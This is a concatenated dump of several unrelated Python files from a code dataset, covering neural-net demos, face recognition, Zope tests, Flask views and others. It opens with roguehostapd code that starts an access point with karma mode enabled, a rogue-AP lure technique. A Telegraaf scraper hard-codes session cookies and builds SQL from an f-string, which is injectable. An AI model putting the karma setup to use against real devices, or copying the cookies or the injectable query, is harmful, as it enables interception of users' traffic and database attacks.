\"\"\"\n Stop the hostapd\n\n :param self: A Hostapd object\n :type self: Hostapd\n :return: None\n :rtype: None\n ..note: the stop function uses the eloop_terminate function in hostapd\n shared library to stop AP.\n \"\"\"\n self.hostapd_lib.eloop_terminate()\n if self.hostapd_thread.is_alive():\n self.hostapd_thread.join(5)\n\n if os.path.isfile(hostapd_constants.HOSTAPD_CONF_PATH):\n os.remove(hostapd_constants.HOSTAPD_CONF_PATH)\n if os.path.isfile(hostapd_constants.DENY_MACS_PATH):\n os.remove(hostapd_constants.DENY_MACS_PATH)\n\nif __name__ == '__main__':\n\n HOSTAPD_CONFIG_DICT = {\n 'ssid': 'test',\n 'interface': 'wlan0',\n 'karma_enable': 1,\n 'deny_macs': ['00:00:00:11:22:33']\n }\n\n HOSTAPD_OPTION_DICT = {\n 'debug_level': hostapd_constants.HOSTAPD_DEBUG_OFF,\n 'key_data': True,\n 'timestamp': False,\n 'version': False,\n 'mute': True,\n 'eloop_term_disable': True}\n HOSTAPD_OBJ = Hostapd()\n HOSTAPD_OBJ.start(HOSTAPD_CONFIG_DICT, HOSTAPD_OPTION_DICT)\n import time\n while True:\n try:\n time.sleep(1)\n except KeyboardInterrupt:\n HOSTAPD_OBJ.stop()\n break\n","sub_path":"roguehostapd/hostapd_controller.py","file_name":"hostapd_controller.py","file_ext":"py","file_size_in_byte":14468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"650315182","text":"import os\nprint(os.__file__)\n\nimport numpy as np\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib.collections import PatchCollection\nfrom matplotlib.patches import Circle\nimport matplotlib.animation as animation\nimport time\n\n\nfrom sklearn.datasets import make_circles\n\n# In[2]:\n\n\n# PROBLEM\nn = 500\np = 2\n\nX, Y = make_circles(n_samples=n, factor=0.5, noise=0.05)\nY = Y[:, np.newaxis]\n\ndef plot_circle():\n plt.scatter(X[Y[:, 0] == 0, 0], X[Y[:, 0] == 0, 1], c=\"skyblue\")\n plt.scatter(X[Y[:, 0] == 1, 0], X[Y[:, 0] == 1, 1], c=\"salmon\")\n plt.axis(\"equal\")\n plt.show()\n \n#plot_circle()\n\n\n# In[3]:\n\n\n# FUNCIONES DE ACTIVACION\nsigm = (lambda x: 1 / (1 + np.e ** (-x)),\n lambda x: x * (1 - x))\n\nrelu = lambda x: np.maximum(0, x)\n\nl2_cost = (lambda Yp, Yr: np.mean((Yp - Yr) ** 2),\n lambda Yp, Yr: (Yp - Yr))\n\ndef plot_activation_function():\n _x = np.linspace(-5, 5, 100)\n plt.plot(_x, relu(_x))\n\n\n# In[4]:\n\n\n# CAPA DE LA RN\nclass NNLayer:\n num_connections = 0\n num_neurons = 0\n activation_function = sigm\n\n def __init__(self, num_conections, num_neurons, activation_function):\n self.num_neurons = num_neurons\n self.num_connections = num_conections\n self.activation_function = activation_function\n\n self.bias = np.random.rand(1, num_neurons) * 2 - 1\n self.weights = np.random.rand(num_conections, num_neurons) * 2 - 1\n\n def info(self, l):\n print('Capa {} - N:{} C:{}'.format(l, self.num_neurons, self.num_connections))\n\n def val(self,n):\n return self.bias[0][n]\n\n# In[5]:\n\n# RED N\nclass NN():\n\n def __init__(self):\n self.layer = []\n self.layers = 0\n self.topology = []\n self.hidden_layers = 0\n self.out = [(None, X)]\n self.artist = {}\n self.loss = 0\n self.trains = 0\n\n def from_topology(self, topology: object, act_f: object) -> object:\n self.topology = topology\n self.layers = len(topology)\n self.hidden_layers = self.layers - 2\n\n # add layers\n for l, t in enumerate(topology[:-1]):\n print('Add layer {2:d}: con({0:2d}) neurons({1:2d})'.format(topology[l], topology[l + 1], l))\n self.layer.append(NNLayer(topology[l], topology[l + 1], act_f))\n\n #todo: add last layer\n self.layer.append(NNLayer(topology[-1], 1, act_f))\n\n def from_layers(self, num_inputs: int = 0, layers: object = []) -> object:\n self.layers = len(layers)\n self.hidden_layers = self.layers - 1\n self.topology = [num_inputs]\n\n for n, l in enumerate(layers):\n print('Add layer {2:d}: con({0:2d}) neurons({1:2d})'.format(l.num_connections, l.num_neurons, n))\n self.layer.append(l)\n self.topology.append(l.num_neurons)\n\n def fit(self,X):\n self.out = [(None, X)]\n\n # Forward pass\n for layer in nn.layer:\n z = self.out[-1][1] @ layer.weights + layer.bias\n a = layer.activation_function[0](z)\n\n self.out.append((z, a))\n\n return self.out[-1][1]\n\n def train(self,X,Y,lr=0.5):\n # Backward pass\n self.trains += 1\n deltas = []\n self.fit(X)\n for l in reversed(range(0, len(self.layer))):\n z = self.out[l + 1][0]\n a = self.out[l + 1][1]\n\n layer = self.layer[l]\n\n if l == len(self.layer) - 1:\n deltas.insert(0, l2_cost[1](a, Y) * layer.activation_function[1](a))\n else:\n deltas.insert(0, deltas[0] @ _W.T * layer.activation_function[1](a))\n\n _W = layer.weights\n\n # Gradient descent\n layer.bias = layer.bias - np.mean(deltas[0], axis=0, keepdims=True) * lr\n layer.weights = layer.weights - self.out[l][1].T @ deltas[0] * lr\n\n #self.artist[0, 0, 1].set_text(\"{0:.3f}\".format(X))\n #self.artist[0, 1, 1].set_text(\"{0:.3f}\".format(Y))\n # update loss\n self.loss = l2_cost[0](self.out[-1][1], Y)\n return self.out[-1][1]\n\n def closs(self,Y):\n self.loss = l2_cost[0](self.out[-1][1],Y)\n return self.loss\n\n def draw(self, ax, left, right, bottom, top):\n ims = []\n '''\n Draw a neural network cartoon using matplotilb.\n\n :usage:\n >>> fig = plt.figure(figsize=(12, 12))\n >>> draw_neural_net(fig.gca(), .1, .9, .1, .9, [4, 7, 2])\n\n :parameters:\n - ax : matplotlib.axes.AxesSubplot\n The axes on which to plot the cartoon (get e.g. by plt.gca())\n - left : float\n The center of the leftmost node(s) will be placed here\n - right : float\n The center of the rightmost node(s) will be placed here\n - bottom : float\n The center of the bottommost node(s) will be placed here\n - top : float\n The center of the topmost node(s) will be placed here\n - layer_sizes : list of int\n List of layer sizes, including input and output dimensionality\n '''\n v_spacing = (top - bottom) / float(max(self.topology))\n h_spacing = (right - left) / float(len(self.topology) - 1)\n # Nodes\n for n, layer_size in enumerate(self.topology):\n layer_top = v_spacing * (layer_size - 1) / 2. + (top + bottom) / 2.\n for m in range(layer_size):\n x, y = (n * h_spacing + left, layer_top - m * v_spacing)\n print(\"c\",n,\" n\",m)\n color=\"w\"\n val = 0\n\n if n > 0:\n val = self.layer[n-1].val(m)\n if val > 0:\n color=\"lime\"\n else:\n color=\"tomato\"\n\n circle = plt.Circle((x,y), v_spacing / 4., color=color, ec='k', zorder=4)\n ax.add_artist(circle)\n label = plt.text(x,y,\"{2:.3f}\".format(n,m,val),fontsize=8, ha=\"center\", zorder=5)\n ax.add_artist(label)\n\n self.artist[n, m, 0] = circle\n self.artist[n, m, 1] = label\n\n x, y = (1,1)\n label = plt.text(x, y, \"Loss {0:.5f} - Iter {1:4d}\".format(0,0), fontsize=8, ha=\"center\", zorder=5,color=\"green\")\n ax.add_artist(label)\n self.artist[n+1,m+1,1] = label\n\n # Edges\n for n, (layer_size_a, layer_size_b) in enumerate(zip(self.topology[:-1], self.topology[1:])):\n layer_top = v_spacing * (layer_size - 1) / 2. + (top + bottom) / 2.\n layer_top_a = v_spacing * (layer_size_a - 1) / 2. + (top + bottom) / 2.\n layer_top_b = v_spacing * (layer_size_b - 1) / 2. + (top + bottom) / 2.\n for m in range(layer_size_a):\n x, y = (n * h_spacing + left, layer_top - m * v_spacing)\n for o in range(layer_size_b):\n line = plt.Line2D([n * h_spacing + left, (n + 1) * h_spacing + left],\n [layer_top_a - m * v_spacing, layer_top_b - o * v_spacing], c='silver')\n ax.add_artist(line)\n self.artist[m,n,2,o] = plt.text(n * h_spacing + left, (n + 1) * layer_top_b - o * v_spacing,\"{0:.3f}\".format(0),color=\"blue\",fontsize=6)\n\n\n\n def update_draw(self):\n for n, layer_size in enumerate(self.topology):\n for m in range(layer_size):\n color = \"seashell\"\n val = 0\n if n > 0:\n val = self.layer[n - 1].val(m)\n if val > 0:\n color = \"lime\"\n else:\n color = \"tomato\"\n self.artist[n, m, 0].set_color(color)\n self.artist[n, m, 1].set_text(\"{0:.3f}\".format(val))\n self.artist[n+1,m+1,1].set_text(\"Loss {0:.5f} - Iter {1:4d}\".format(self.loss,self.trains))\n for n, (layer_size_a, layer_size_b) in enumerate(zip(self.topology[:-1], self.topology[1:])):\n for m in range(layer_size_a):\n for o in range(layer_size_b):\n self.artist[m,n,2,o].set_text(\"{0:.3f}\".format(self.layer[n].weights[1][o]))\n\n\n# In[16]:\n\n\n# FUNCION DE ENTRENAMIENTO\n\ntopology = [p, 16, 8, 1]\n\n\n\ndef train(nn, X, Y, l2_cost, lr=0.25, train=True):\n out = [(None, X)]\n\n # Forward pass\n for layer in nn.layer[:-1]:\n z = out[-1][1] @ layer.weights + layer.bias\n a = layer.activation_function[0](z)\n\n out.append((z, a))\n\n if train:\n\n # Backward pass\n deltas = []\n\n for l in reversed(range(0, nn.layers - 1)):\n z = out[l + 1][0]\n a = out[l + 1][1]\n\n if l == nn.layers - 2:\n deltas.insert(0, l2_cost[1](a, Y) * nn.layer[l].activation_function[1](a))\n else:\n deltas.insert(0, deltas[0] @ _W.T * nn.layer[l].activation_function[1](a))\n\n _W = nn.layer[l].weights\n\n # Gradient descent\n nn.layer[l].bias = nn.layer[l].bias - np.mean(deltas[0], axis=0, keepdims=True) * lr\n nn.layer[l].weights = nn.layer[l].weights - out[l][1].T @ deltas[0] * lr\n\n return out[-1][1]\n\n\nfrom IPython.display import clear_output\ndef visual_plot():\n # VISUALIZACIÓN Y TEST\n\n import time\n \n\n loss = []\n\n for i in range(1000):\n\n # Entrenemos a la red!\n pY = train(nn, X, Y, l2_cost, lr=0.05)\n\n if i % 25 == 0:\n\n print(pY)\n\n loss.append(l2_cost[0](pY, Y))\n\n res = 100\n\n _x0 = np.linspace(-1.5, 1.5, res)\n _x1 = np.linspace(-1.5, 1.5, res)\n\n _Y = np.zeros((res, res))\n\n for i0, x0 in enumerate(_x0):\n for i1, x1 in enumerate(_x1):\n _Y[i0, i1] = train(nn, np.array([[x0, x1]]), Y, l2_cost, train=False)[0][0]\n\n plt.pcolormesh(_x0, _x1, _Y, cmap=\"coolwarm\")\n plt.axis(\"equal\")\n\n plt.scatter(X[Y[:, 0] == 0, 0], X[Y[:, 0] == 0, 1], c=\"skyblue\")\n plt.scatter(X[Y[:, 0] == 1, 0], X[Y[:, 0] == 1, 1], c=\"salmon\")\n\n clear_output(wait=True)\n plt.show()\n\n plt.plot(range(len(loss)), loss)\n\n time.sleep(0.1)\n \n plt.show()\n # print(pY)\n\n\nfrom IPython.display import clear_output\n\n\ndef visual_plot2():\n # VISUALIZACIÓN Y TEST\n\n import time\n\n loss = []\n\n for i in range(1000):\n\n # Entrenemos a la red!\n pY = nn.train(X, Y, lr=0.5)\n\n if i % 25 == 0:\n\n #print(pY)\n\n cost = l2_cost[0](pY, Y)\n loss.append(nn.closs(Y))\n print(i,cost)\n\n res = 100\n\n _x0 = np.linspace(-1.5, 1.5, res)\n _x1 = np.linspace(-1.5, 1.5, res)\n\n _Y = np.zeros((res, res))\n\n for i0, x0 in enumerate(_x0):\n for i1, x1 in enumerate(_x1):\n _Y[i0, i1] = nn.fit(np.array([[x0, x1]]))[0][0]\n\n plt.pcolormesh(_x0, _x1, _Y, cmap=\"coolwarm\")\n plt.axis(\"equal\")\n\n plt.scatter(X[Y[:, 0] == 0, 0], X[Y[:, 0] == 0, 1], c=\"skyblue\")\n plt.scatter(X[Y[:, 0] == 1, 0], X[Y[:, 0] == 1, 1], c=\"salmon\")\n\n clear_output(wait=True)\n plt.show()\n\n plt.plot(range(len(loss)), loss)\n\n time.sleep(0.1)\n plt.show()\n\nloss = []\n\ndef vis_train(n):\n print(n)\n img = []\n # Entrenemos a la red!\n pY = nn.train(X, Y, lr=0.5)\n loss.append(nn.loss)\n nn.update_draw()\n #.plot(range(len(loss)),loss)\n return img\n\nzz = NN()\nzz.from_topology([p, 4, 8, 1], sigm)\n\nl1 = NNLayer(2, 4, sigm)\nl2 = NNLayer(4, 8, sigm)\nl3 = NNLayer(8, 1, sigm)\n\nnn = NN()\nnn.from_layers(2, [l1, l2, l3])\nprint(nn.topology)\n#from Draw_NN import draw_neural_net\n\n\nfig = plt.figure(figsize=(12, 12))\nax = fig.gca()\nax.axis('off')\n\nnn.draw(ax, .1, .9, .1, .9)\nani = animation.FuncAnimation(fig, vis_train, frames=100, interval=4, blit=True)\n#visual_plot2()\nplt.show()\n\n","sub_path":"Red_Neuronal2.py","file_name":"Red_Neuronal2.py","file_ext":"py","file_size_in_byte":11997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"572005279","text":"\nimport logging\nimport re\nfrom collections import namedtuple\nimport cssselect\nimport locale\nfrom amcatclient import AmcatAPI\nfrom lxml import html\nimport requests\nfrom datetime import datetime\n\nfrom rsslib import create_connection\nimport csv\nimport sys\n\n\n\ndef polish(textstring):\n #This function polishes the full text of the articles - it separated the lead from the rest by ||| and separates paragraphs and subtitles by ||.\n lines = textstring.strip().split('\\n')\n lead = lines[0].strip()\n rest = '||'.join( [l.strip() for l in lines[1:] if l.strip()] )\n if rest: result = lead + ' ||| ' + rest\n else: result = lead\n return result.strip()\n\n\ndef get_css(tree, selection, text=True, error=True):\n res = tree.cssselect(selection)\n if len(res) != 1:\n if not error:\n return None\n raise ValueError(\"Selection {selection} yielded {n} results\".format(n=len(res), **locals()))\n return res[0]\n\n\ndef get_links(conn):\n cur = conn.cursor()\n cur.execute(\"SELECT link FROM articles where medium ='telegraaf.nl'\")\n rows = list(cur.fetchall())\n db_links = []\n for row in rows:\n id = row[0]\n db_links.append(id)\n return db_links\n\n\ndef get_meta(conn,url):\n cur = conn.cursor()\n cur.execute(f\"SELECT title, medium, date FROM articles where link ='{url}'\")\n title, medium, date = list(cur.fetchall())[0]\n return {\"title\": title,\n \"publisher\": medium,\n \"date\": date}\n\ndef scrape_article(session, url):\n page = session.get(url)\n if page.status_code == 404:\n return\n page.raise_for_status()\n open(\"/tmp/test7.html\", \"w\").write(page.text)\n tree = html.fromstring(page.text)\n for label in tree.cssselect(\"span.label\"):\n if label.text_content().strip().startswith(\"Liveblog\"):\n return None\n lead_ps = tree.cssselect('p.ArticleIntroBlock__paragraph')\n body_ps = tree.xpath('//div[@data-element=\"articleBodyBlocks\"]/p')\n text = \"\\n\\n\".join(p.text_content() for p in lead_ps + body_ps)\n return {\"text\": text}\n\nCOOKIES = {\n '__cfduid':'d56655838cd13e536c63a84867a1cd55c1585123110',\n 'clientid':\"ck871dfn22m9y568461ch66fv\",\n 'didomi_token':'eyJ1c2VyX2lkIjoiMTcxMTBiMzMtMTBjYS02YTViLWFkNDAtMmQwMGFjNGJlZTY2IiwiY3JlYXRlZCI6IjIwMjAtMDMtMjVUMDc6NTg6MzEuMjA4WiIsInVwZGF0ZWQiOiIyMDIwLTAzLTI1VDA3OjU4OjUwLjk0OFoiLCJ2ZW5kb3JzIjp7ImVuYWJsZWQiOlsiZ29vZ2xlIiwiZmFjZWJvb2siLCJjOm5sLXByb2ZpZWwiXSwiZGlzYWJsZWQiOltdfSwicHVycG9zZXMiOnsiZW5hYmxlZCI6WyJmdW5jdGlvbmVlbCIsInNvY2lhbF9tZWRpYSIsIm5sX3Byb2ZpZWwiLCJjb29raWVzIiwiYWR2ZXJ0aXNpbmdfcGVyc29uYWxpemF0aW9uIiwiY29udGVudF9wZXJzb25hbGl6YXRpb24iLCJhZF9kZWxpdmVyeSIsImFuYWx5dGljcyJdLCJkaXNhYmxlZCI6W119fQ==',\n 'euconsent': 'BOwzpeIOwzphNAHABBNLC--AAAAuhr_7__7-_9_-_f__9uj3Or_v_f__32ccL59v_h_7v-_7fi_20nV4u_1vft9yfk1-5ctDztp507iakivXmqdeb9v_nz3_5pxP78k89r7337Ew_v8_v-b7BCON_YxEiA',\n 'OB-USER-TOKEN': '82e48dea-c07a-420c-a5e2-cece4269fb48',\n 'paywallversion': '1',\n}\n\ndef create_cookie(domain, name, value):\n return {\n \"name\": name,\n \"value\": value,\n \"domain\": domain,\n }\n\nsession = requests.session()\nfor name, value in COOKIES.items():\n session.cookies.set(**create_cookie(\"www.telegraaf.nl\", name, value))\nr = session.get(\"https://www.telegraaf.nl/nieuws/1071777683/pvd-a-ers-houden-samengaan-met-groen-links-af\")\nr.raise_for_status()\n#\n# print(\"aantal nieuwe bevestigde besmettingen\" in r.text)\n# open(\"/tmp/test.html\", \"w\").write(r.text)\n# sys.exit()\n#links = [\"https://www.nu.nl/coronavirus/6039788/kinderen-thuis-in-coronatijd-zoek-de-lichtpuntjes-ga-geen-schooltje-spelen.html\"]\n\n\n\ndb = \"landelijkemedia.db\"\nconn = create_connection(db)\nlinks = get_links(conn)\nfrom amcatclient import AmcatAPI\nc = AmcatAPI(\"http://vu.amcat.nl\")\n#links=['https://www.telegraaf.nl/nieuws/321571165/tientallen-bedolven-door-instorten-quarantainehotel-in-china']\nfor l in links:\n print(l)\n if 'video' in l:\n continue\n if 'redirect' in l:\n continue\n meta = get_meta(conn, l)\n if 'Liveblog' in meta['title']:\n continue\n a = scrape_article(session, l)\n if not a:\n continue\n else:\n a.update(meta)\n c.create_articles(2, 1385, [a])\n\n","sub_path":"telegraaf_rssfeed.py","file_name":"telegraaf_rssfeed.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"73909770","text":"# follow.py\n#\n# Watch a log file (stocks in this case)\n\nimport os\nimport time\n\ndef follow(filename):\n f = open(filename, 'r')\n f.seek(0, os.SEEK_END)\n\n while True:\n line = f.readline() \n if not line:\n time.sleep(0.1)\n continue # Retry\n yield line # Emit a line\n\nimport csv\n\ndef parse_stock_data(lines):\n rows = csv.reader(lines)\n types = [str, float, str, str, float, float, float, float, int]\n converted = ( [func(val) for func, val in zip(types, row)] for row in rows)\n return converted\n\nlines = follow('Data/stocklog.csv')\nrows = parse_stock_data(lines)\nnegchange = (row for row in rows if row[4] < 0)\nfor row in negchange:\n name = row[0]\n price = row[1]\n change = row[4]\n print('{:>10s} {:>10.2f} {:>10.2f}'.format(name, price, change))\n","sub_path":"code/live/follow.py","file_name":"follow.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"170637426","text":"import face_recognition\nfrom sklearn import svm\nimport os\nencodings = []\nnames = []\ntrain_dir = os.listdir('./lfw/')\nprint(\"train_dir:\",train_dir)\nfor person in train_dir:\n pix = os.listdir(\"./lfw/\" + person)\n for person_img in pix:\n face = face_recognition.load_image_file(\"./lfw/\" + person + \"/\" + person_img)\n face_locations=face_recognition.face_locations(face)\n print(face_locations)\n if len(face_locations)==1:\n face_enc = face_recognition.face_encodings(face)[0]\n print(\"person:\",person)\n print(\"face_enc:\",face_enc)\n encodings.append(face_enc)\n names.append(person)\n else:\n print(person+\"can not used for tarining\")\nclf = svm.SVC(gamma='scale')\nclf.fit(encodings, names)\ntest_image = face_recognition.load_image_file('Aaron_peirsol-2.jpg')\nface_locations = face_recognition.face_locations(test_image)\nno = len(face_locations)\n\nprint(\"Number of faces detected: \", no)\nprint(\"Found: \\n\")\nfor i in range(no):\n test_image_enc = face_recognition.face_encodings(test_image)[i]\n name = clf.predict([test_image_enc])\n print(*name)\n","sub_path":"PycharmProjects/0429_new/person2.py","file_name":"person2.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"538116693","text":"##############################################################################\n#\n# Copyright (c) 2001, 2002 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"Row class tests.\n\n$Id$\n\"\"\"\n\nfrom unittest import TestCase, main, makeSuite\n\nclass RowTests(TestCase):\n\n def test_RowClassFactory(self):\n from zope.rdb import RowClassFactory\n\n columns = ('food', 'name')\n data = ('pizza', 'john')\n\n klass = RowClassFactory(columns)\n ob = klass(data)\n\n self.failUnless(ob.food == 'pizza', \"bad row class attribute\")\n self.failUnless(ob.name == 'john', \"bad row class attribute (2)\")\n\n def test_RowClassFactory_Proxied(self):\n from zope.rdb import RowClassFactory\n from zope.security.proxy import ProxyFactory\n from zope.security.interfaces import ForbiddenAttribute\n from zope.security.interfaces import IChecker\n\n columns = ('type', 'speed')\n data = ('airplane', '800km')\n\n klass = RowClassFactory(columns)\n\n ob = klass(data)\n\n proxied = ProxyFactory(ob)\n\n self.failUnless (proxied.type == 'airplane', \"security proxy error\")\n self.failUnless (proxied.speed == '800km', \"security proxy error (2)\")\n self.assertRaises(ForbiddenAttribute, getattr, proxied, '__slots__')\n\n # Indirectly, check the the __Security_checker__ attribute has been\n # applied only to the instance, and not to the class.\n self.assertRaises(ForbiddenAttribute, getattr, proxied, '__bases__')\n proxied_class = ProxyFactory(klass)\n proxied_class.__bases__\n\n # Check __Security_checker__ directly\n self.assertRaises(AttributeError,\n getattr, klass, '__Security_checker__')\n self.assert_(IChecker.providedBy(ob.__Security_checker__))\n\n def test__cmp__(self):\n from zope.rdb import RowClassFactory\n\n columns = ('food', 'name')\n data = ('pizza', 'john')\n\n klass = RowClassFactory(columns)\n ob = klass(data)\n self.assertEqual(ob, ob, \"not equal to self\")\n\n klass2 = RowClassFactory(columns)\n ob2 = klass2(data)\n self.assertEqual(ob, ob2, \"not equal to an identical class\")\n\n columns = ('food', 'surname')\n data = ('pizza', 'john')\n\n klass3 = RowClassFactory(columns)\n ob3 = klass3(data)\n self.assert_(ob < ob3, \"cmp with different columns\")\n\n columns = ('food', 'name')\n data = ('pizza', 'mary')\n\n klass4 = RowClassFactory(columns)\n ob4 = klass4(data)\n self.assert_(ob < ob4, \"cmp with different data\")\n\n def test_InstanceOnlyDescriptor(self):\n from zope.rdb import InstanceOnlyDescriptor\n inst = object() # could be anything\n cls = object # could be any class\n d = InstanceOnlyDescriptor()\n self.assertRaises(AttributeError, d.__get__, inst, cls)\n self.assertRaises(AttributeError, d.__get__, None, cls)\n self.assertRaises(AttributeError, d.__delete__, inst)\n d.__set__(inst, 23)\n self.assertEquals(d.__get__(inst, cls), 23)\n self.assertRaises(AttributeError, d.__get__, None, cls)\n d = InstanceOnlyDescriptor(23)\n self.assertEquals(d.__get__(inst, cls), 23)\n d.__delete__(inst)\n self.assertRaises(AttributeError, d.__get__, inst, cls)\n self.assertRaises(AttributeError, d.__get__, None, cls)\n self.assertRaises(AttributeError, d.__delete__, inst)\n\n\ndef test_suite():\n return makeSuite(RowTests)\n\nif __name__=='__main__':\n main(defaultTest='test_suite')\n","sub_path":"zope.rdb/branches/3.5/src/zope/rdb/tests/test_row.py","file_name":"test_row.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"410577965","text":"# Palindrome Partitioning\n# Author: Pavan Kumar Paluri\n# Dynamic Programming using Memoization method\n# Leetcode Question: https://leetcode.com/problems/palindrome-partitioning/\n\n# Time and Space Complexity: O(N*2^N), O(N^2)\n\nclass Solution:\n def partition(self, s: str) -> List[List[str]]:\n '''\n given a string, generate all possible palindrome outputs\n '''\n result =[]\n # 2d boolean array for storing start and i's\n dp = [[False for _ in range(len(s))] for _ in range(len(s))]\n # dfs_bt \n def is_palindrome(s, low, high):\n while low < high:\n if s[low]==s[high]:\n low+=1\n high-=1\n else:\n return False \n return True\n def dfs_backtracking(start, current, s):\n \n # Stopping condition\n \n if start >= len(s):\n result.append(current[:])\n \n # backtrack\n for i in range(start, len(s)):\n \n # If it is a palindrome --> condition still needs to be added\n if s[start]==s[i] and (i-start<=2 or dp[start+1][i-1]):\n #if is_palindrome(s, start, i):\n dp[start][i] = True\n current.append(s[start:i+1])\n dfs_backtracking(i+1, current, s)\n current.pop()\n \n dfs_backtracking(0, [], s)\n return result\n","sub_path":"Python/Palindromes/Palindrome_Partitioning.py","file_name":"Palindrome_Partitioning.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"611882765","text":"from managers import Manager, entity_list, entity_write, entity_single\n\n\n\n\nclass GameManager(Manager):\n\n\n\t@entity_list()\n\tdef get_games(self):\n\t\tcursor = self.db.cursor()\n\t\tcursor.execute(\"\"\"\n\t\t\tSELECT \n\t\t\t\tid, title, price, description, developer, genre\n\t\t\tFROM\n\t\t\t\tgame \n\t\t\"\"\")\n\t\tresults = cursor.fetchall()\n\t\treturn cursor, results\n\n\t@entity_single()\n\tdef get_game(self, id):\n\t\tcursor = self.db.cursor()\n\t\tcursor.execute(\"\"\"\n\t\t\tSELECT \n\t\t\t\tid, title, price, description, developer, genre\n\t\t\tFROM\n\t\t\t\tgame \n\t\t\tWHERE id = %s\n\t\t\"\"\", (id,))\n\t\tresults = cursor.fetchall()\n\t\treturn cursor, results\n\n\t@entity_write()\n\tdef insert_game(self, vals):\n\t\tcursor = self.db.cursor()\n\t\tcursor.execute(\"\"\"\n\t\t\tINSERT INTO game(title, price, description, developer, genre)\n\t\t\tVALUES(%s, %s, %s, %s, %s)\n\t\t\t\"\"\", (\n\t\t\t\tvals['title'],\n\t\t\t\tvals['price'],\n\t\t\t\tvals['description'],\n\t\t\t\tvals['developer'],\n\t\t\t\tvals['genre']\n\t\t\t\t)\n\t\t\t)\n\t\treturn self.db, cursor","sub_path":"database/games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"388218182","text":"from flask import render_template, redirect, url_for\nfrom . import usuario\nfrom .forms import CadastroUsuarioForm, EditUsuarioForm\nfrom ..models import Usuario\nfrom .. import db\nfrom flask_login import login_required\n\n\n@usuario.route('/usuarios')\n@login_required\ndef index():\n users = Usuario.query.all()\n return render_template('usuario/lista.html', users=users)\n\n\n@usuario.route('/usuario/cadastro', methods=['GET', 'POST'])\n@login_required\ndef cadastro():\n usuarioForm = CadastroUsuarioForm()\n if usuarioForm.validate_on_submit():\n user = Usuario()\n user.nome = usuarioForm.nome.data\n user.sobrenome = usuarioForm.sobrenome.data\n user.email = usuarioForm.email.data\n db.session.add(user)\n db.session.commit()\n return redirect(url_for('usuario.index'))\n return render_template('usuario/cadastro.html', form=usuarioForm)\n\n\n@usuario.route('/usuario/delete/')\n@login_required\ndef delete(id):\n user = Usuario.query.get_or_404(id)\n db.session.delete(user)\n db.session.commit()\n return redirect(url_for('usuario.index'))\n\n\n@usuario.route('/usuario/editar/', methods=['GET', 'POST'])\n@login_required\ndef edit(id):\n user = Usuario.query.get_or_404(id)\n usuarioForm = EditUsuarioForm(user=user)\n if usuarioForm.validate_on_submit():\n user.nome = usuarioForm.nome.data\n user.sobrenome = usuarioForm.sobrenome.data\n db.session.add(user)\n db.session.commit()\n return redirect(url_for('usuario.index'))\n usuarioForm.nome.data = user.nome\n usuarioForm.sobrenome.data = user.sobrenome\n return render_template('usuario/editar.html', form=usuarioForm)\n","sub_path":"app/usuario/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"87807998","text":"import torch\nimport numpy as np\nimport os\nimport argparse\nimport datetime\nfrom tensorboardX import SummaryWriter\nfrom data.load_radio_ml import get_radio_ml_loader as get_loader\nfrom data.data_utils import iq2spiketrain as to_spike_train\nimport matplotlib.pyplot as plt\nimport tqdm\nfrom mpl_toolkits import mplot3d\n\n\nif __name__ == '__main__':\n classes = ['32PSK', '16APSK', '32QAM', 'FM', 'GMSK', '32APSK', 'OQPSK', '8ASK', 'BPSK', '8PSK', 'AM-SSB-SC', '4ASK',\n '16PSK', '64APSK', '128QAM', '128APSK', 'AM-DSB-SC', 'AM-SSB-WC', '64QAM', 'QPSK', '256QAM', 'AM-DSB-WC',\n 'OOK', '16QAM']\n\n modulation_idx = classes.index('32PSK') # OOK 32PSK 64QAM\n\n torch.manual_seed(123)\n np.random.seed(123)\n\n get_loader_kwargs = {}\n to_st_train_kwargs = {}\n\n # Set \"get loader\" kwargs\n get_loader_kwargs['data_dir'] = '/mnt/013c8c34-4de2-4dab-9e29-16618f093336/playground/RFSNN/2018.01'\n get_loader_kwargs['min_snr'] = 6\n get_loader_kwargs['max_snr'] = 6\n get_loader_kwargs['per_h5_frac'] = 0.25\n get_loader_kwargs['train_frac'] = 0.9\n get_loader_kwargs['per_sample_frac'] = 1.0\n get_loader_kwargs['normalize'] = True\n get_loader_kwargs['fake_height'] = False\n get_loader_kwargs['skip_1'] = False\n get_loader_kwargs['classes'] = 24\n # Set \"to spike train\" kwargs\n\n wh = 16\n to_st_train_kwargs['out_w'] = wh #args.I_resolution\n to_st_train_kwargs['out_h'] = wh #args.Q_resolution\n\n train_data = get_loader(24, train=True, **get_loader_kwargs)\n gen_train = iter(train_data)\n\n fig, ax = plt.subplots(2, 1)\n plt.ion()\n plt.show()\n for step in range(10):\n try:\n input, labels = next(gen_train)\n except StopIteration:\n gen_train = iter(train_data)\n input, labels = next(gen_train)\n\n 